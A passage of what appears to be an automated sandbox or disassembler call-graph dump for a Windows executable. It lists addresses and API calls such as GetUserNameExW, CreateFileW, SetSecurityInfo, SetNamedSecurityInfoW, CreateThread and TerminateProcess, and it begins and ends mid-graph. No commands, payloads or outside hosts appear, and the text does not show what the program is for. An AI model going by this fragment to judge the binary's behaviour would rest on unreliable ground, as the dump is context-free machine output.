42630->42633 42631->42630 42636 7ff7c171d527 LeaveCriticalSection 42632->42636 42637 7ff7c171d377 GetUserNameExW 42632->42637 42633->42632 42634 7ff7c171d6a0 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42635 7ff7c171d6d9 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42634->42635 42640 7ff7c171d753 42634->42640 42642 7ff7c1742180 _handle_error 8 API calls 42635->42642 42641 7ff7c17421d4 std::_Facet_Register 5 API calls 42636->42641 42643 7ff7c171d3b9 42637->42643 42644 7ff7c171d3a6 GetLastError 42637->42644 42638 7ff7c171d74d 42639 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42638->42639 42639->42640 42646 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42640->42646 42645 7ff7c171d53a 42641->42645 42647 7ff7c171d727 42642->42647 42676 7ff7c1715790 35 API calls 3 library calls 42643->42676 42644->42643 42659 7ff7c171d452 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42644->42659 42650 7ff7c171d5cc 42645->42650 42656 7ff7c1713f80 35 API calls 42645->42656 42651 7ff7c171d759 42646->42651 42649 7ff7c171d3c9 GetUserNameExW 42652 7ff7c171d3f0 42649->42652 42653 7ff7c171d3e6 GetLastError 42649->42653 42654 7ff7c171d605 42650->42654 42657 7ff7c1713f80 35 API calls 42650->42657 42663 7ff7c1713f80 35 API calls 42652->42663 42655 7ff7c171d417 42653->42655 42658 7ff7c171d627 42654->42658 42662 7ff7c1713f80 35 API calls 42654->42662 42655->42659 42668 7ff7c171d748 42655->42668 42656->42650 42657->42654 42660 7ff7c171d649 42658->42660 42666 7ff7c1713f80 35 API calls 42658->42666 42659->42636 42677 7ff7c170a740 36 API calls 3 library calls 42659->42677 42679 7ff7c171ea60 9 API calls std::_Facet_Register 42660->42679 42662->42658 42663->42655 42665 7ff7c171d51b 42678 7ff7c1709720 31 API calls 2 library calls 42665->42678 42666->42660 42667->42634 42667->42638 42670 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42668->42670 42669 7ff7c171d4ee 42669->42665 42675 7ff7c1713f80 35 API calls 42669->42675 42670->42638 42672 7ff7c171d526 42672->42636 42673 7ff7c171d4b5 42673->42665 42673->42669 42674 7ff7c1713f80 35 API calls 42673->42674 42674->42669 42675->42665 42676->42649 42677->42673 42678->42672 42679->42667 42680 7ff7c1701649 EnterCriticalSection 42681 7ff7c1701664 LeaveCriticalSection 42680->42681 42682 7ff7c1701699 EnterCriticalSection 42681->42682 42683 7ff7c17016b0 CloseHandle 42682->42683 42684 7ff7c17016bd 42682->42684 42683->42684 42685 7ff7c17016d6 LeaveCriticalSection 42684->42685 42686 7ff7c17016c9 DeregisterEventSource 42684->42686 42691 7ff7c171f350 64 API calls 3 library calls 42685->42691 42686->42685 42688 7ff7c17016ea 42689 7ff7c1742180 _handle_error 8 API calls 42688->42689 42690 7ff7c17016fc 42689->42690 42691->42688 42692 7ff7c174e500 42693 7ff7c174e51d 42692->42693 42694 7ff7c174e50e GetLastError ExitThread 42692->42694 42695 7ff7c1753e64 _Toupper 16 API calls 42693->42695 42696 7ff7c174e522 42695->42696 42705 7ff7c175a9d0 42696->42705 42699 7ff7c174e53b 42709 7ff7c171e8c0 42699->42709 42701 7ff7c174e550 42723 7ff7c174e700 42701->42723 42706 7ff7c175a9e0 42705->42706 42707 7ff7c174e52e 42705->42707 42706->42707 42726 7ff7c1757bc0 42706->42726 42707->42699 42722 7ff7c17581f0 5 API calls try_get_function 42707->42722 42710 7ff7c171e8d7 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42709->42710 42711 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42710->42711 42712 7ff7c171e9ee Concurrency::details::platform::DefaultWaiterPool::get_waiter 42710->42712 42713 7ff7c171ea15 42711->42713 42712->42701 42714 7ff7c171ea29 42713->42714 42715 7ff7c171ea3c 42713->42715 42729 7ff7c171d760 WaitForSingleObject 42714->42729 42759 7ff7c1744c18 RtlPcToFileHeader RaiseException 42715->42759 42718 7ff7c171ea59 42720 7ff7c174e700 17 API calls 42721 7ff7c171ea35 42720->42721 42721->42701 42722->42699 42761 7ff7c174e568 42723->42761 42727 7ff7c1757998 try_get_function 5 API calls 42726->42727 42728 7ff7c1757be8 42727->42728 42728->42707 42730 7ff7c171d8a6 ReleaseMutex 42729->42730 42734 7ff7c171d8d4 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42729->42734 42731 7ff7c171da41 ResetEvent 42730->42731 42730->42734 42732 7ff7c171da48 WaitForSingleObject 42731->42732 42732->42734 42735 7ff7c171da5f 42732->42735 42733 7ff7c171e853 42737 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42733->42737 42734->42733 42736 7ff7c171da02 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42734->42736 42742 7ff7c171e84e 42734->42742 42754 7ff7c171e865 42734->42754 42738 7ff7c171da68 ReleaseMutex 42735->42738 42739 7ff7c171da77 ReleaseMutex 42735->42739 42740 7ff7c1742180 _handle_error 8 API calls 42736->42740 42741 7ff7c171e859 42737->42741 42746 7ff7c171dab8 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42739->42746 42743 7ff7c171da16 42740->42743 42747 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42741->42747 42745 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42742->42745 42743->42720 42745->42733 42746->42734 42751 7ff7c171dac1 EnterCriticalSection 42746->42751 42748 7ff7c171e85f 42747->42748 42749 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42748->42749 42749->42754 42750 7ff7c171e88e 42753 7ff7c171db20 CloseHandle 42751->42753 42752 7ff7c17488fc 31 API calls _invalid_parameter_noinfo_noreturn 42752->42754 42757 7ff7c171e826 42753->42757 42754->42750 42754->42752 42760 7ff7c1713e30 33 API calls 42754->42760 42758 7ff7c171e8c0 36 API calls 42757->42758 42758->42742 42759->42718 42770 7ff7c1753fe0 GetLastError 42761->42770 42763 7ff7c174e579 42764 7ff7c174e5c0 ExitThread 42763->42764 42765 7ff7c174e595 42763->42765 42793 7ff7c1758230 5 API calls try_get_function 42763->42793 42766 7ff7c174e5a9 42765->42766 42767 7ff7c174e5a3 CloseHandle 42765->42767 42766->42764 42769 7ff7c174e5b7 FreeLibraryAndExitThread 42766->42769 42767->42766 42769->42764 42771 7ff7c1754007 42770->42771 42772 7ff7c1754002 42770->42772 42776 7ff7c175400f SetLastError 42771->42776 42795 7ff7c1757e5c 6 API calls try_get_function 42771->42795 42794 7ff7c1757e14 6 API calls try_get_function 42772->42794 42775 7ff7c175402a 42775->42776 42778 7ff7c1754fdc _invalid_parameter_noinfo 12 API calls 42775->42778 42776->42763 42779 7ff7c175403d 42778->42779 42780 7ff7c175405b 42779->42780 42781 7ff7c175404b 42779->42781 42797 7ff7c1757e5c 6 API calls try_get_function 42780->42797 42796 7ff7c1757e5c 6 API calls try_get_function 42781->42796 42784 7ff7c1754063 42785 7ff7c1754067 42784->42785 42786 7ff7c1754079 42784->42786 42798 7ff7c1757e5c 6 API calls try_get_function 42785->42798 42799 7ff7c1753c14 14 API calls _invalid_parameter_noinfo 42786->42799 42787 7ff7c1754052 42790 7ff7c1755054 __free_lconv_num 12 API calls 42787->42790 42790->42776 42791 7ff7c1754081 42792 7ff7c1755054 __free_lconv_num 12 API calls 42791->42792 42792->42776 42793->42765 42795->42775 42796->42787 42797->42784 42798->42787 42799->42791 42800 7ff7c1736b2a 42801 7ff7c1736b45 42800->42801 42802 7ff7c1736b33 42800->42802 42803 7ff7c1736b59 42801->42803 42804 7ff7c1736cbf 42801->42804 42808 7ff7c1713f80 35 API calls 42802->42808 42805 7ff7c1713f80 35 API calls 42803->42805 42806 7ff7c1736d0f 42804->42806 42807 7ff7c1736cc5 42804->42807 42811 7ff7c1736b83 42805->42811 42809 7ff7c1736d19 42806->42809 42810 7ff7c1736e55 42806->42810 42812 7ff7c1736cd2 CreateFileW 42807->42812 42813 7ff7c1736ccf 42807->42813 42808->42801 42814 7ff7c172a350 258 API calls 42809->42814 42816 7ff7c1736e5b 42810->42816 42817 7ff7c1736e36 42810->42817 42815 7ff7c1713f80 35 API calls 42811->42815 42812->42817 42818 7ff7c1736d0a 42812->42818 42813->42812 42820 7ff7c1736d34 42814->42820 42821 7ff7c1736baf 42815->42821 42823 7ff7c1709520 35 API calls 42816->42823 42822 7ff7c1736e43 RegCloseKey 42817->42822 42824 7ff7c1736d3e 42817->42824 42819 7ff7c1736d57 GetKernelObjectSecurity 42818->42819 42825 7ff7c1736d7e 42819->42825 42834 7ff7c1736e11 ctype 42819->42834 42820->42817 42820->42819 42820->42824 42897 7ff7c17142a0 58 API calls 3 library calls 42821->42897 42822->42824 42828 7ff7c1736e67 42823->42828 42824->42828 42830 7ff7c1736ef1 GetNamedSecurityInfoW 42824->42830 42831 7ff7c1736d8e GetLastError 42825->42831 42832 7ff7c1736df1 GetKernelObjectSecurity 42825->42832 42827 7ff7c1736e2d CloseHandle 42827->42817 42829 7ff7c1736fdc MakeAbsoluteSD GetLastError 42828->42829 42842 7ff7c1736da1 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42828->42842 42833 7ff7c1737032 GetLastError 42829->42833 42851 7ff7c173708e ctype 42829->42851 42830->42828 42830->42842 42831->42842 42845 7ff7c1736dce Concurrency::details::platform::DefaultWaiterPool::get_waiter 42831->42845 42832->42834 42833->42842 42833->42845 42834->42817 42834->42827 42835 7ff7c1736c5c 42841 7ff7c1736c93 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42835->42841 42892 7ff7c173743f 42835->42892 42836 7ff7c1736bc0 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42836->42804 42836->42835 42837 7ff7c1737445 42836->42837 42839 7ff7c173744b 42836->42839 42840 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42837->42840 42838 7ff7c1742180 _handle_error 8 API calls 42843 7ff7c173741f 42838->42843 42844 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42839->42844 42840->42839 42841->42845 42842->42845 42842->42892 42847 7ff7c1737451 42844->42847 42845->42838 42846 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42846->42837 42848 7ff7c1737452 42847->42848 42849 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42848->42849 42850 7ff7c1737457 42849->42850 42853 7ff7c173765d Concurrency::details::platform::DefaultWaiterPool::get_waiter 42850->42853 42902 7ff7c1736970 33 API calls 4 library calls 42850->42902 42852 7ff7c173716f 42851->42852 42898 7ff7c171be10 35 API calls 5 library calls 42851->42898 42856 7ff7c1737189 MakeAbsoluteSD 42852->42856 42899 7ff7c171be10 35 API calls 5 library calls 42852->42899 42859 7ff7c17376aa Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 42853->42859 42887 7ff7c1737fe7 42853->42887 42858 7ff7c17371e6 IsValidSid 42856->42858 42873 7ff7c173720f 42856->42873 42863 7ff7c17371f3 ctype 42858->42863 42858->42873 42864 7ff7c1742180 _handle_error 8 API calls 42859->42864 42860 7ff7c1737218 IsValidSid 42874 7ff7c1737225 ctype 42860->42874 42882 7ff7c1737241 42860->42882 42861 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42865 7ff7c1737fed 42861->42865 42862 7ff7c1737185 42862->42856 42900 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 42863->42900 42869 7ff7c17376f8 42864->42869 42876 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42865->42876 42866 7ff7c1737257 ctype 42877 7ff7c1737347 GetLastError 42866->42877 42878 7ff7c173726b IsValidSecurityDescriptor 42866->42878 42867 7ff7c173724f LocalFree 42867->42866 42870 7ff7c1737ef9 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42871 7ff7c1737f82 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42870->42871 42872 7ff7c1737fdc 42870->42872 42896 7ff7c1738005 42870->42896 42871->42853 42880 7ff7c1737fe1 42871->42880 42881 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42872->42881 42873->42860 42873->42882 42901 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 42874->42901 42883 7ff7c1737ff3 42876->42883 42886 7ff7c173727d Concurrency::details::platform::DefaultWaiterPool::get_waiter 42877->42886 42878->42877 42878->42886 42879 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42884 7ff7c173800b 42879->42884 42885 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42880->42885 42881->42880 42882->42866 42882->42867 42888 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42883->42888 42885->42887 42886->42842 42886->42848 42889 7ff7c173743a 42886->42889 42887->42861 42890 7ff7c1737ff9 42888->42890 42891 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42889->42891 42893 7ff7c1709910 33 API calls 42890->42893 42891->42892 42892->42846 42894 7ff7c1737fff 42893->42894 42895 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42894->42895 42895->42896 42896->42879 42897->42836 42898->42852 42899->42862 42900->42873 42901->42882 42902->42870 42903 7ff7c171cd0a 42933 7ff7c171d0a0 EnterCriticalSection 42903->42933 42907 7ff7c171cdcf Concurrency::details::platform::DefaultWaiterPool::get_waiter 42909 7ff7c171cddb 42907->42909 42910 7ff7c171cdf6 42907->42910 42908 7ff7c171cd1a Concurrency::details::platform::DefaultWaiterPool::get_waiter 42908->42907 42911 7ff7c171d084 42908->42911 42912 7ff7c1713f80 35 API calls 42909->42912 42913 7ff7c1709520 35 API calls 42910->42913 42914 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42911->42914 42932 7ff7c171cdf1 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42912->42932 42922 7ff7c171ce03 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42913->42922 42916 7ff7c171d089 42914->42916 42915 7ff7c171cf9c RegisterEventSourceW 42960 7ff7c174e62c 42915->42960 42919 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42916->42919 42921 7ff7c171d08f 42919->42921 42920 7ff7c171cec4 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42923 7ff7c1709520 35 API calls 42920->42923 42925 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42921->42925 42922->42916 42922->42920 42931 7ff7c171ced6 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42923->42931 42927 7ff7c171d095 42925->42927 42926 7ff7c171d03e LeaveCriticalSection 42929 7ff7c1742180 _handle_error 8 API calls 42926->42929 42928 7ff7c171cfea Concurrency::details::platform::DefaultWaiterPool::get_waiter 42928->42926 42930 7ff7c171d065 42929->42930 42931->42915 42931->42921 42931->42932 42932->42915 42934 7ff7c171d0db 42933->42934 42935 7ff7c171d186 42933->42935 42936 7ff7c171d1ab LeaveCriticalSection 42934->42936 42937 7ff7c1714fc0 36 API calls 42934->42937 42939 7ff7c1713f80 35 API calls 42935->42939 42938 7ff7c1742180 _handle_error 8 API calls 42936->42938 42940 7ff7c171d0f2 42937->42940 42941 7ff7c171cd11 42938->42941 42946 7ff7c171d17f Concurrency::details::platform::DefaultWaiterPool::get_waiter 42939->42946 42942 7ff7c170ac70 35 API calls 42940->42942 42950 7ff7c1714fc0 42941->42950 42943 7ff7c171d123 42942->42943 42944 7ff7c1713f80 35 API calls 42943->42944 42945 7ff7c171d145 42944->42945 42945->42936 42945->42946 42947 7ff7c171d1cc 42945->42947 42946->42936 42948 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42947->42948 42949 7ff7c171d1d1 42948->42949 42951 7ff7c17421d4 std::_Facet_Register 5 API calls 42950->42951 42952 7ff7c1714fec memcpy_s 42951->42952 42953 7ff7c1715010 GetModuleFileNameW 42952->42953 42954 7ff7c1715044 42953->42954 42956 7ff7c1715066 42953->42956 42957 7ff7c1713f80 35 API calls 42954->42957 42955 7ff7c1715093 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42955->42908 42956->42955 42958 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42956->42958 42957->42956 42959 7ff7c17150be 42958->42959 42961 7ff7c174e65c 42960->42961 42962 7ff7c174e645 42960->42962 42979 7ff7c174e5cc 42961->42979 42986 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42962->42986 42965 7ff7c174e64a 42987 7ff7c17488dc 31 API calls _invalid_parameter_noinfo 42965->42987 42968 7ff7c174e66f CreateThread 42970 7ff7c174e6ac 42968->42970 42971 7ff7c174e69f GetLastError 42968->42971 42969 7ff7c171cfd9 42969->42928 42978 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42969->42978 42970->42969 42973 7ff7c174e6bc CloseHandle 42970->42973 42974 7ff7c174e6c2 42970->42974 42988 7ff7c174e188 14 API calls 2 library calls 42971->42988 42973->42974 42975 7ff7c174e6cb FreeLibrary 42974->42975 42976 7ff7c174e6d1 42974->42976 42975->42976 42977 7ff7c1755054 __free_lconv_num 14 API calls 42976->42977 42977->42969 42978->42928 42980 7ff7c1754fdc _invalid_parameter_noinfo 14 API calls 42979->42980 42981 7ff7c174e5ee 42980->42981 42982 7ff7c1755054 __free_lconv_num 14 API calls 42981->42982 42983 7ff7c174e5f8 42982->42983 42984 7ff7c174e619 42983->42984 42985 7ff7c174e5ff GetModuleHandleExW 42983->42985 42984->42968 42984->42970 42985->42984 42986->42965 42987->42969 42988->42970 42989 7ff7c1722dcb 42990 7ff7c1722dd9 42989->42990 42991 7ff7c172346c 42989->42991 42992 7ff7c1722de7 42990->42992 42993 7ff7c1723481 42990->42993 43146 7ff7c1744c18 RtlPcToFileHeader RaiseException 42991->43146 42995 7ff7c1722e03 42992->42995 43134 7ff7c1727b10 154 API calls 6 library calls 42992->43134 43147 7ff7c1744c18 RtlPcToFileHeader RaiseException 42993->43147 43000 7ff7c1722e4f 42995->43000 43001 7ff7c1722e34 42995->43001 43005 7ff7c1722e90 42995->43005 42998 7ff7c172349a 43148 7ff7c1744c18 RtlPcToFileHeader RaiseException 42998->43148 43006 7ff7c1722e6f 43000->43006 43007 7ff7c1722e54 43000->43007 43004 7ff7c1709520 35 API calls 43001->43004 43002 7ff7c1722df5 43002->42995 43002->42998 43003 7ff7c17234af 43149 7ff7c1744c18 RtlPcToFileHeader RaiseException 43003->43149 43010 7ff7c1722e39 43004->43010 43018 7ff7c17231dc 43005->43018 43028 7ff7c1722f4f 43005->43028 43136 7ff7c17341a0 35 API calls 2 library calls 43005->43136 43008 7ff7c1709520 35 API calls 43006->43008 43011 7ff7c1709520 35 API calls 43007->43011 43012 7ff7c1722e74 43008->43012 43135 7ff7c17296d0 78 API calls 3 library calls 43010->43135 43016 7ff7c1722e59 43011->43016 43017 7ff7c172bc40 244 API calls 43012->43017 43013 7ff7c17234c4 43150 7ff7c1744c18 RtlPcToFileHeader RaiseException 43013->43150 43014 7ff7c172331f 43021 7ff7c1713f80 35 API calls 43014->43021 43022 7ff7c172b710 258 API calls 43016->43022 43023 7ff7c1722e6b 43017->43023 43018->43014 43025 7ff7c172320e 43018->43025 43141 7ff7c175de6c 64 API calls 2 library calls 43018->43141 43019 7ff7c1722e4b 43019->43023 43027 7ff7c1723339 43021->43027 43022->43023 43023->43003 43023->43005 43031 7ff7c1709520 35 API calls 43025->43031 43026 7ff7c1722f27 43137 7ff7c1735f60 40 API calls 43026->43137 43033 7ff7c1713f80 35 API calls 43027->43033 43034 7ff7c1722fe1 43028->43034 43035 7ff7c1723054 43028->43035 43029 7ff7c17234da 43037 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43029->43037 43036 7ff7c1723222 43031->43036 43059 7ff7c1723389 43033->43059 43038 7ff7c172300e 43034->43038 43039 7ff7c1722ff3 43034->43039 43040 7ff7c1713f80 35 API calls 43035->43040 43041 7ff7c1723271 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43036->43041 43055 7ff7c17234e6 43036->43055 43043 7ff7c17234e0 43037->43043 43046 7ff7c172302e 43038->43046 43047 7ff7c1723013 43038->43047 43044 7ff7c1709520 35 API calls 43039->43044 43045 7ff7c172308a 43040->43045 43042 7ff7c1723287 43041->43042 43142 7ff7c173e1c0 94 API calls 4 library calls 43041->43142 43051 7ff7c17232ce 43042->43051 43052 7ff7c17232b3 43042->43052 43069 7ff7c172328b 43042->43069 43061 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43043->43061 43053 7ff7c1722ff8 43044->43053 43054 7ff7c1713f80 35 API calls 43045->43054 43050 7ff7c1709520 35 API calls 43046->43050 43048 7ff7c1709520 35 API calls 43047->43048 43056 7ff7c1723018 43048->43056 43057 7ff7c1723033 43050->43057 43062 7ff7c17232ee 43051->43062 43063 7ff7c17232d3 43051->43063 43058 7ff7c1709520 35 API calls 43052->43058 43138 7ff7c17296d0 78 API calls 3 library calls 43053->43138 43084 7ff7c17230c9 43054->43084 43065 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43055->43065 43067 7ff7c172b710 258 API calls 43056->43067 43070 7ff7c172bc40 244 API calls 43057->43070 43071 7ff7c17232b8 43058->43071 43060 7ff7c17233ee Concurrency::details::platform::DefaultWaiterPool::get_waiter 43059->43060 43078 7ff7c1723502 43059->43078 43066 7ff7c1723437 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43060->43066 43080 7ff7c1723508 43060->43080 43061->43055 43068 7ff7c1709520 35 API calls 43062->43068 43072 7ff7c1709520 35 API calls 43063->43072 43065->43069 43076 7ff7c1742180 _handle_error 8 API calls 43066->43076 43074 7ff7c172302a 43067->43074 43075 7ff7c17232f3 43068->43075 43151 7ff7c1744c18 RtlPcToFileHeader RaiseException 43069->43151 43070->43074 43143 7ff7c17296d0 78 API calls 3 library calls 43071->43143 43079 7ff7c17232d8 43072->43079 43073 7ff7c172300a 43073->43074 43074->43013 43093 7ff7c172304f Concurrency::details::platform::DefaultWaiterPool::get_waiter 43074->43093 43144 7ff7c172e530 177 API calls 6 library calls 43075->43144 43082 7ff7c172344f 43076->43082 43086 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43078->43086 43088 7ff7c172b710 258 API calls 43079->43088 43090 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43080->43090 43084->43029 43085 7ff7c1723130 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43084->43085 43085->43043 43085->43093 43086->43080 43087 7ff7c17232ca 43089 7ff7c17232ea 43087->43089 43088->43089 43091 7ff7c1723310 43089->43091 43145 7ff7c175de6c 64 API calls 2 library calls 43089->43145 43092 7ff7c172350e 43090->43092 43091->43014 43091->43069 43098 7ff7c1713f80 35 API calls 43092->43098 43094 7ff7c17231c8 43093->43094 43139 7ff7c1736010 41 API calls 2 library calls 43093->43139 43140 7ff7c17340e0 31 API calls 2 library calls 43094->43140 43099 7ff7c1723584 43098->43099 43100 7ff7c1713f80 35 API calls 43099->43100 43101 7ff7c17235b2 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43100->43101 43102 7ff7c17243e2 43101->43102 43103 7ff7c172371c Concurrency::details::platform::DefaultWaiterPool::get_waiter 43101->43103 43105 7ff7c17243dd 43101->43105 43104 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43102->43104 43106 7ff7c1742180 _handle_error 8 API calls 43103->43106 43107 7ff7c17243e8 43104->43107 43109 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43105->43109 43108 7ff7c17243c0 43106->43108 43110 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43107->43110 43109->43102 43111 7ff7c17243ee 43110->43111 43112 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43111->43112 43113 7ff7c17243f4 43112->43113 43114 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43113->43114 43115 7ff7c17243fa 43114->43115 43116 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43115->43116 43117 7ff7c1724400 43116->43117 43118 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43117->43118 43119 7ff7c1724406 43118->43119 43120 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43119->43120 43121 7ff7c172440c 43120->43121 43122 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43121->43122 43123 7ff7c1724412 43122->43123 43124 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43123->43124 43125 7ff7c1724418 43124->43125 43126 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43125->43126 43127 7ff7c172441e 43126->43127 43128 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43127->43128 43129 7ff7c1724424 43128->43129 43130 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43129->43130 43131 7ff7c172442a 43130->43131 43132 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43131->43132 43133 7ff7c1724430 43132->43133 43134->43002 43135->43019 43136->43026 43137->43028 43138->43073 43139->43094 43140->43018 43141->43025 43142->43042 43143->43087 43144->43089 43145->43091 43146->42993 43147->42998 43148->43003 43149->43013 43150->43029 43151->43078 43152 7ff7c1752ff4 43153 7ff7c175305b 43152->43153 43154 7ff7c1753011 GetModuleHandleW 43152->43154 43162 7ff7c1752eec 43153->43162 43154->43153 43156 7ff7c175301e 43154->43156 43156->43153 43176 7ff7c17530fc GetModuleHandleExW 43156->43176 43158 7ff7c175309d 43160 7ff7c17530af 43182 7ff7c174f264 EnterCriticalSection 43162->43182 43164 7ff7c1752f08 43165 7ff7c1752f24 57 API calls 43164->43165 43166 7ff7c1752f11 43165->43166 43167 7ff7c174f2b8 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 43166->43167 43168 7ff7c1752f19 43167->43168 43168->43158 43169 7ff7c17530b0 43168->43169 43183 7ff7c175aa24 43169->43183 43172 7ff7c17530ea 43173 7ff7c17530fc 3 API calls 43172->43173 43175 7ff7c17530f1 ExitProcess 43173->43175 43174 7ff7c17530d9 GetCurrentProcess TerminateProcess 43174->43172 43177 7ff7c1753141 43176->43177 43178 7ff7c1753122 GetProcAddress 43176->43178 43180 7ff7c175314b FreeLibrary 43177->43180 43181 7ff7c1753151 43177->43181 43178->43177 43179 7ff7c1753139 43178->43179 43179->43177 43180->43181 43181->43153 43184 7ff7c17530bd 43183->43184 43185 7ff7c175aa42 43183->43185 43184->43172 43184->43174 43187 7ff7c1757b70 5 API calls try_get_function 43185->43187 43187->43184 43188 7ff7c1737715 43189 7ff7c173771f 43188->43189 43190 7ff7c1737ef0 43188->43190 43192 7ff7c173772c 43189->43192 43193 7ff7c17379d1 43189->43193 43290 7ff7c1736970 33 API calls 4 library calls 43190->43290 43194 7ff7c1713f80 35 API calls 43192->43194 43196 7ff7c1737bb6 43193->43196 43197 7ff7c17379e3 43193->43197 43201 7ff7c1737a48 43193->43201 43195 7ff7c1737759 43194->43195 43198 7ff7c1713f80 35 API calls 43195->43198 43196->43201 43206 7ff7c172a350 258 API calls 43196->43206 43199 7ff7c17379ed 43197->43199 43200 7ff7c17379f0 CreateFileW 43197->43200 43203 7ff7c1737790 43198->43203 43199->43200 43204 7ff7c1737a29 43200->43204 43205 7ff7c1737a35 GetLastError 43200->43205 43207 7ff7c1709520 35 API calls 43201->43207 43276 7ff7c1737a86 ctype 43201->43276 43202 7ff7c1737f82 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43217 7ff7c173765d Concurrency::details::platform::DefaultWaiterPool::get_waiter 43202->43217 43218 7ff7c1737fe1 43202->43218 43280 7ff7c17142a0 58 API calls 3 library calls 43203->43280 43210 7ff7c1737c03 SetSecurityInfo 43204->43210 43205->43201 43215 7ff7c1737bdc 43206->43215 43211 7ff7c1737a66 43207->43211 43208 7ff7c1737ef9 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43208->43202 43209 7ff7c1737fdc 43208->43209 43268 7ff7c1738005 43208->43268 43219 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43209->43219 43210->43201 43222 7ff7c1737b3d 43210->43222 43282 7ff7c17150c0 72 API calls 3 library calls 43211->43282 43212 7ff7c1737b33 43221 7ff7c1737e16 SetNamedSecurityInfoW 43212->43221 43212->43222 43227 7ff7c1737cd9 43212->43227 43228 7ff7c1737d05 43212->43228 43214 7ff7c1737af9 43214->43212 43214->43222 43284 7ff7c1739fb0 16 API calls _handle_error 43214->43284 43215->43201 43215->43210 43216 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43223 7ff7c173800b 43216->43223 43230 7ff7c1737fe7 43217->43230 43279 7ff7c17376aa Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 43217->43279 43224 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43218->43224 43219->43218 43221->43222 43234 7ff7c1737e78 43221->43234 43231 7ff7c1737b58 43222->43231 43232 7ff7c1737b4f CloseHandle 43222->43232 43224->43230 43225 7ff7c1737a75 43243 7ff7c1709520 35 API calls 43225->43243 43225->43276 43255 7ff7c1713f80 35 API calls 43227->43255 43269 7ff7c1737d00 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43227->43269 43235 7ff7c1737ff9 43228->43235 43236 7ff7c1737d2b 43228->43236 43233 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43230->43233 43239 7ff7c1737b6d 43231->43239 43240 7ff7c1737b62 RegCloseKey 43231->43240 43232->43231 43242 7ff7c1737fed 43233->43242 43234->43222 43254 7ff7c1737ec8 